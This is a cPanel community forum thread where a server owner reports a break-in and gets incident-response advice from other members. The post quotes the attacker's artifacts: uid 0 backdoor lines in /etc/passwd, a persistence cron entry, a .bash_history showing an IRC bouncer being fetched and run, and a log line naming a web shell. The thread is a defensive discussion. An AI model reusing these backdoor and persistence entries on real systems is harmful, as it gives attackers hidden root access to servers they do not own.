The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Two hackcheck notice email

Discussion in 'Security' started by reficul, Apr 18, 2012.

  1. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    [hackcheck] mysqli has a uid 0 account
    [hackcheck] services has a uid 0 account

    History command report this activity

    what to do?
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,478
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    If you're unsure of your next steps, you can save yourself a lot of time by hiring someone who might be able to help.

    cPanel has a list of people who probably can help, located here:
    Sys Admin Services « Application Catalog
     
  3. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    Is this a VPS or server you're running? If it's a webserver, could be a script or configuration error. But if it's a VPS, I'd assume you may have been breached :-/ Do you have root access over the server?
     
  4. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    It's a dedicated Server. After I remove the two string from passwd,
    As yesterday, at 2.59am the two strings

    services:x:0:0::/home/services:/bin/bash
    mysqli:x:0:0::/home/mysqli:/bin/bash

    added again in the etc/passwd file.

    and I find also:

    sgl:x:32008:32010::/home/sgl:/bin/bash

    Some strange files in home/sgl like:
    psybiru.tar.gz
     
  5. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    Ouch. You have been breached. Getting any random calls from this domain?

    -removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. it translates to http[colon]3xploit.110mb.com

    psybiru.tar.gz is an IP shell, lets you use IRC through it, aka a BNC server. Disaster recover time...

    These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do :)

    1. Backup your web-data locally immediately
    2. Change all of your passwords - ftp, web, mail etc.. In fact, kill FTP altogether if you can to be safe.
    3. Make sure any non-cpanel scripts are updated, if you can, term them too.
    4. Go to your rap ip logs, turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user setup somewhere with vulnerable permissions.
    5. BLOCK anything from 110mb.com. It is 1 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little bit of time for you to examine the logs.

    Are you running webdav? Again, if you can turn it off, do so. The webdav exploit isn't new, but it's been popping up again on the underground forums.. wierd how old stuff can come back to bite ya, huh? Oh ya, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.

    If you can figure out if you have any IRC/BNC connections and what the source IP's are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off..
     
    #5 theitjerk, Apr 19, 2012
    Last edited by a moderator: Apr 19, 2012
  6. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    Reported to 110mb.com. They take care of this stuff pretty quick, but take care of your situation ASAP! Feel free to let me know if you need help, I'll be around for a couple more hours if you need anything (applies to anyone else having an issue with this)- Just checked, this domain has been around for a bit.. wierd.
     
  7. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    Thank you for your help. I want to make first a full backup and after that we can play with this.
     
  8. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    Glad to see your head is in the right place - Remember, your backups will likely be infected to some degree as well. don't just pop them right back up without some proper analysis..
     
  9. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    A fast tip to block 110mb?
     
  10. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    You can either block the FQDN (fully qualified domain name) or a single IP, or a range. In this case, I would block a range (10.12.12.1-10.12.13.1), since 110mb is a shared host, and a popular one at that. Use the IP Deny Manager in cPanel.
     
  11. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    A little update,
    I found also:
    * * * * * /home/sgl/components/y2kupdate ]/dev/null 2]&1
    in sgl user (not configured by cpanel and me).
     
  12. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    .bash_history on the fake user:

    Code:
    id
    sudo -i
    hostname
    w
    logout
    cat /etc/ssh/sshd_config
    sudo -i
    id
    w
    wget -removed url-
    tar -zxvf psyBNC-2.3.2-7.tar.gz
    cd psybnc
    make menuconfig
    sudo -i
    make menuconfig
    whereis ld
    make menuconfig
    make
    ls -al
    pwd
    pico psybncchk
    ./psybnc
    kill -9 24536
    ps -c
    ls -al
    cat psybnc.conf
    pico psybnc.conf
    ./psybnc
    ps -c
    ./psybnc
    ps -c
    cd
    ls -al
    wget -removed url-  -zxvf psybiru.tar.gz
    cd components/
    ./config 1234;./****************;./run
    cd scripts
    rm -rf DEFAULT.SCRIPT
    wget -removed url-
    cd
    logout
    sudo
    sudo -i
    ls -al
    ps -c
    ps -x
    killall -9 psybnc
    cd psybnc
    ./psybnc
    cat psybnc.conf
    ps -c
    pwd
    killall -9 psybnc
    pico psybnc.conf
    ./psybnc
    pico psybnc.conf
    killall -9 psybnc
    pico psybnc.conf
    ./psybnc
    sudo -i
    cd
    killall -9 psybnc
    ls -al
    cd components
    ls -al
    pico psybnc.conf
    pico ssstt
    rm -rf ssstt
    ps -x
    killall -9 psybnc
    killall -9 psybnc
     
    #12 reficul, Apr 20, 2012
    Last edited by a moderator: Apr 23, 2012
  13. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    with visudo find also:
     
  14. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    This is the hole?
    Code:
    /var/log/exim_mainlog:118423:2012-04-17 13:29:12 1SK6au-0006Vw-Tw <= user@myserver.com U=user P=local S=549 T="Fx29Shell http://domainaccount.com/wp-commentsrss.php?act=img&img=buffer by 180.252.**.***" for email@gmail.com
    
     
    #14 reficul, Apr 20, 2012
    Last edited by a moderator: Apr 23, 2012
  15. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Do you mean it is wordpress, because exim cannot execute commands that would cause this type of issue.
     
Loading...

Share This Page